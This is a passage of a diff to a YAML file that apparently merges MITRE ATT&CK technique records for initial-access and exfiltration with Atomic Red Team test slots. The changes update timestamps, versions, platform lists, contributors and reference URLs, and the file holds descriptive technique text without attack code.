       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1566.002
     atomic_tests: []
   T1566.001:
     technique:
-      modified: '2024-01-31T14:09:27.066Z'
+      modified: '2024-10-15T16:42:01.552Z'
       name: 'Phishing: Spearphishing Attachment'
       description: "Adversaries may send spearphishing emails with a malicious attachment
         in an attempt to gain access to victim systems. Spearphishing attachment is
@@ -58945,7 +59873,7 @@ initial-access:
       - source_name: ACSC Email Spoofing
         description: Australian Cyber Security Centre. (2012, December). Mitigating
           Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
       - source_name: Unit 42 DarkHydrus July 2018
         description: Falcone, R., et al. (2018, July 27). New Threat Actor Group DarkHydrus
           Targets Middle East Government. Retrieved August 2, 2018.
@@ -58962,7 +59890,6 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1566.001
     atomic_tests: []
   T1195.003:
@@ -58992,7 +59919,7 @@ initial-access:
         the adversary a high degree of control over the system. Hardware backdoors
         may be inserted into various devices, such as servers, workstations, network
         infrastructure, or peripherals.
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-04-28T16:05:10.755Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Compromise Hardware Supply Chain
       x_mitre_detection: Perform physical inspection of hardware to look for potential
@@ -59006,7 +59933,6 @@ initial-access:
       - 'Sensor Health: Host Status'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1091:
     technique:
@@ -59069,12 +59995,11 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1091
     atomic_tests: []
   T1195:
     technique:
-      modified: '2024-02-26T14:23:37.009Z'
+      modified: '2024-10-04T11:17:00.778Z'
       name: Supply Chain Compromise
       description: "Adversaries may manipulate products or product delivery mechanisms
         prior to receipt by a final consumer for the purpose of data or system compromise.\n\nSupply
@@ -59149,7 +60074,7 @@ initial-access:
         description: Schneider Electric. (2018, August 24). Security Notification
           – USB Removable Media Provided With Conext Combox and Conext Battery Monitor.
           Retrieved May 28, 2019.
-        url: https://www.se.com/ww/en/download/document/SESN-2018-236-01/
+        url: https://www.se.com/us/en/download/document/SESN-2018-236-01/
       - source_name: Trendmicro NPM Compromise
         description: Trendmicro. (2018, November 29). Hacker Infects Node.js Package
           to Steal from Bitcoin Wallets. Retrieved April 10, 2019.
@@ -59163,19 +60088,18 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1195
     atomic_tests: []
   T1190:
     technique:
-      modified: '2023-11-28T21:27:35.373Z'
+      modified: '2024-09-24T14:33:53.433Z'
       name: Exploit Public-Facing Application
       description: |-
         Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration.
 
-        Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).
+        Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet-accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).
 
-        If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.
+        If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs (e.g., via the [Cloud Instance Metadata API](https://attack.mitre.org/techniques/T1552/005)), exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.
 
         Adversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar)
 
@@ -59201,7 +60125,7 @@ initial-access:
       - Linux
       - macOS
       - Containers
-      x_mitre_version: '2.5'
+      x_mitre_version: '2.6'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Application Log: Application Log Content'
@@ -59256,7 +60180,6 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1659:
     technique:
@@ -59319,11 +60242,10 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.001:
     technique:
-      modified: '2024-03-07T14:27:04.770Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Default Accounts'
       description: |-
         Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -59338,6 +60260,7 @@ initial-access:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_deprecated: false
       x_mitre_detection: Monitor whether default accounts have been activated or logged
         into. These audits should also include checks on any appliances and applications
@@ -59346,18 +60269,18 @@ initial-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -59389,14 +60312,11 @@ initial-access:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.001
     atomic_tests: []
   T1199:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-15T16:08:39.968Z'
       name: Trusted Relationship
       description: |-
         Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship abuses an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network.
@@ -59407,6 +60327,11 @@ initial-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_contributors:
+      - Praetorian
+      - ExtraHop
+      - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+      x_mitre_deprecated: false
       x_mitre_detection: Establish monitoring for activity conducted by second and
         third party providers and other trusted entities that may be leveraged as
         a means to gain access to the network. Depending on the type of relationship,
@@ -59415,22 +60340,18 @@ initial-access:
         is based on IT services. Adversaries may be able to act quickly towards an
         objective, so proper monitoring for behavior related to Credential Access,
         Lateral Movement, and Collection will be important to detect the intrusion.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Office 365
-      x_mitre_is_subtechnique: false
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '2.3'
-      x_mitre_contributors:
-      - Praetorian
-      - ExtraHop
-      - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '2.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Logon Session: Logon Session Metadata'
@@ -59455,36 +60376,19 @@ initial-access:
         url: https://support.microsoft.com/en-us/topic/partners-offer-delegated-administration-26530dc0-ebba-415b-86b1-b55bc06b073e?ui=en-us&rs=en-us&ad=us
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1566:
     technique:
-      modified: '2024-03-01T16:56:32.245Z'
+      modified: '2024-10-07T15:00:19.668Z'
       name: Phishing
-      description: "Adversaries may send phishing messages to gain access to victim
-        systems. All forms of phishing are electronically delivered social engineering.
-        Phishing can be targeted, known as spearphishing. In spearphishing, a specific
-        individual, company, or industry will be targeted by the adversary. More generally,
-        adversaries can conduct non-targeted phishing, such as in mass malware spam
-        campaigns.\n\nAdversaries may send victims emails containing malicious attachments
-        or links, typically to execute malicious code on victim systems. Phishing
-        may also be conducted via third-party services, like social media platforms.
-        Phishing may also involve social engineering techniques, such as posing as
-        a trusted source, as well as evasive techniques such as removing or manipulating
-        emails or metadata/headers from compromised accounts being abused to send
-        messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation:
-        Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014)
-        Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof)
-        the identity of the sender which can be used to fool both the human recipient
-        as well as automated security tools.(Citation: cyberproof-double-bounce) \n\nVictims
-        may also receive phishing messages that instruct them to call a phone number
-        where they are directed to visit a malicious URL, download malware,(Citation:
-        sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software)
-        or install adversary-accessible remote management tools onto their computer
-        (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation:
-        Unit42 Luna Moth)"
+      description: |-
+        Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.
+
+        Adversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source, as well as evasive techniques such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014) Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof) the identity of the sender which can be used to fool both the human recipient as well as automated security tools,(Citation: cyberproof-double-bounce) or by including the intended target as a party to an existing email thread that includes malicious files or links (i.e., "thread hijacking").(Citation: phishing-krebs)
+
+        Victims may also receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,(Citation: sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software) or install adversary-accessible remote management tools onto their computer (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: Unit42 Luna Moth)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: initial-access
@@ -59513,9 +60417,9 @@ initial-access:
       - macOS
       - Windows
       - SaaS
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '2.5'
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '2.6'
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Network Traffic: Network Traffic Flow'
@@ -59533,7 +60437,11 @@ initial-access:
       - source_name: ACSC Email Spoofing
         description: Australian Cyber Security Centre. (2012, December). Mitigating
           Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+      - source_name: phishing-krebs
+        description: 'Brian Krebs. (2024, March 28). Thread Hijacking: Phishes That
+          Prey on Your Curiosity. Retrieved September 27, 2024.'
+        url: https://krebsonsecurity.com/2024/03/thread-hijacking-phishes-that-prey-on-your-curiosity/
       - source_name: CISA Remote Monitoring and Management Software
         description: CISA. (n.d.). Protecting Against Malicious Use of Remote Monitoring
           and Management Software. Retrieved February 2, 2023.
@@ -59571,11 +60479,10 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:09:46.024Z'
       name: Valid Accounts
       description: |-
         Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -59592,7 +60499,6 @@ initial-access:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
-      x_mitre_attack_spec_version: 3.1.0
       x_mitre_contributors:
       - Syed Ummar Farooqh, McAfee
       - Prasad Somasamudram, McAfee
@@ -59602,7 +60508,7 @@ initial-access:
       - Netskope
       - Mark Wee
       - Praetorian
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -59611,19 +60517,17 @@ initial-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -59671,11 +60575,12 @@ initial-access:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1566.004:
     technique:
-      modified: '2023-10-15T11:49:40.990Z'
+      modified: '2024-10-15T16:06:47.134Z'
       name: Spearphishing Voice
       description: |-
         Adversaries may use voice communications to ultimately gain access to victim systems. Spearphishing voice is a specific variant of spearphishing. It is different from other forms of spearphishing in that is employs the use of manipulating a user into providing access to systems through a phone call or other forms of voice communications. Spearphishing frequently involves social engineering techniques, such as posing as a trusted source (ex: [Impersonation](https://attack.mitre.org/techniques/T1656)) and/or creating a sense of urgency or alarm for the recipient.
@@ -59695,10 +60600,8 @@ initial-access:
       - Linux
       - macOS
       - Windows
-      - Office 365
-      - SaaS
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       type: attack-pattern
@@ -59731,7 +60634,6 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1195.002:
     technique:
@@ -59770,7 +60672,7 @@ initial-access:
         may be specific to a desired victim set or may be distributed to a broad set
         of consumers but only move on to additional tactics on specific victims.(Citation:
         Avast CCleaner3 2018)(Citation: Command Five SK 2011)  "
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-04-28T16:04:36.636Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Compromise Software Supply Chain
       x_mitre_detection: 'Use verification of distributed binaries through hash checking
@@ -59785,7 +60687,6 @@ initial-access:
       - 'File: File Metadata'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.002:
     technique:
@@ -59865,11 +60766,10 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1200:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:40.332Z'
       name: Hardware Additions
       description: |-
         Adversaries may introduce computer accessories, networking hardware, or other computing devices into a system or network that can be used as a vector to gain access. Rather than just connecting and distributing payloads via removable storage (i.e. [Replication Through Removable Media](https://attack.mitre.org/techniques/T1091)), more robust hardware additions can be used to introduce new functionalities and/or features into a system that can then be abused.
@@ -59925,11 +60825,10 @@ initial-access:
         url: https://www.youtube.com/watch?v=fXthwl6ShOg
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1189:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:55:47.494Z'
       name: Drive-by Compromise
       description: "Adversaries may gain access to a system through a user visiting
         a website over the normal course of browsing. With this technique, the user's
@@ -59990,8 +60889,8 @@ initial-access:
       - Windows
       - Linux
       - macOS
-      - SaaS
-      x_mitre_version: '1.5'
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Network Traffic: Network Traffic Content'
@@ -60019,13 +60918,12 @@ initial-access:
         url: https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.004:
     technique:
-      modified: '2024-03-29T15:42:13.499Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Cloud Accounts'
       description: "Valid accounts in cloud environments may allow adversaries to
         perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -60065,8 +60963,10 @@ initial-access:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Jon Sternstein, Stern Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
         or malicious behavior, such as accessing information outside of the normal
@@ -60074,13 +60974,13 @@ initial-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.7'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.8'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Logon Session: Logon Session Metadata'
@@ -60111,9 +61011,6 @@ initial-access:
         url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.004
     atomic_tests:
     - name: Creating GCP Service Account and Service Account Key
@@ -60176,7 +61073,7 @@ initial-access:
           '
   T1566.003:
     technique:
-      modified: '2024-01-31T14:15:55.690Z'
+      modified: '2024-10-15T15:16:30.272Z'
       name: Spearphishing via Service
       description: "Adversaries may send spearphishing messages via third-party services
         in an attempt to gain access to victim systems. Spearphishing via service
@@ -60243,11 +61140,10 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.003:
     technique:
-      modified: '2023-07-14T13:04:04.591Z'
+      modified: '2024-10-15T16:36:36.681Z'
       name: 'Valid Accounts: Local Accounts'
       description: "Adversaries may obtain and abuse credentials of a local account
         as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -60299,15 +61195,14 @@ initial-access:
         external_id: T1078.003
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.003
     atomic_tests: []
 exfiltration:
   T1567:
     technique:
-      modified: '2023-09-05T15:00:36.471Z'
+      modified: '2024-10-15T15:57:40.951Z'
       name: Exfiltration Over Web Service
       description: |-
         Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. Popular Web services acting as an exfiltration mechanism may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to compromise. Firewall rules may also already exist to permit traffic to these services.
@@ -60331,10 +61226,9 @@ exfiltration:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
@@ -60353,13 +61247,12 @@ exfiltration:
         external_id: T1567
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1567.004:
     technique:
-      modified: '2023-10-12T05:22:59.079Z'
+      modified: '2024-10-15T15:57:55.928Z'
       name: Exfiltration Over Webhook
       description: "Adversaries may exfiltrate data to a webhook endpoint rather than
         over their primary command and control channel. Webhooks are simple mechanisms
@@ -60398,9 +61291,8 @@ exfiltration:
       - macOS
       - Linux
       - SaaS
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Office Suite
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Command: Command Execution'
@@ -60450,7 +61342,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1029:
     technique:
@@ -60470,7 +61361,7 @@ exfiltration:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1029
         external_id: T1029
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-28T00:26:48.769Z'
       name: Scheduled Transfer
       description: |-
         Adversaries may schedule data exfiltration to be performed only at certain times of day or at certain intervals. This could be done to blend traffic patterns with normal activity or availability.
@@ -60490,8 +61381,6 @@ exfiltration:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Connection Creation'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1011:
     technique:
@@ -60538,7 +61427,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1011.001:
     technique:
@@ -60558,7 +61446,7 @@ exfiltration:
       - source_name: mitre-attack
         external_id: T1011.001
         url: https://attack.mitre.org/techniques/T1011/001
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-08T21:02:15.802Z'
       name: Exfiltration Over Bluetooth
       description: |-
         Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If the command and control network is a wired Internet connection, an adversary may opt to exfiltrate data using a Bluetooth communication channel.
@@ -60580,8 +61468,6 @@ exfiltration:
       - 'File: File Access'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1020:
     technique:
@@ -60635,7 +61521,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1020
     atomic_tests: []
   T1048.001:
@@ -60660,7 +61545,7 @@ exfiltration:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-28T00:43:24.228Z'
       name: Exfiltration Over Symmetric Encrypted Non-C2 Protocol
       description: "Adversaries may steal data by exfiltrating it over a symmetrically
         encrypted network protocol other than that of the existing command and control
@@ -60695,12 +61580,10 @@ exfiltration:
       - 'Command: Command Execution'
       - 'File: File Access'
       - 'Network Traffic: Network Connection Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1020.001:
     technique:
-      modified: '2023-04-14T23:23:30.327Z'
+      modified: '2024-10-15T16:08:13.273Z'
       name: Traffic Duplication
       description: |-
         Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised infrastructure. Traffic mirroring is a native feature for some devices, often used for network analysis. For example, devices may be configured to forward network traffic to one or more destinations for analysis by a network analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring)(Citation: Juniper Traffic Mirroring)
@@ -60725,11 +61608,10 @@ exfiltration:
       x_mitre_platforms:
       - Network
       - IaaS
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Network Traffic: Network Connection Creation'
       - 'Network Traffic: Network Traffic Flow'
-      x_mitre_network_requirements: false
       type: attack-pattern
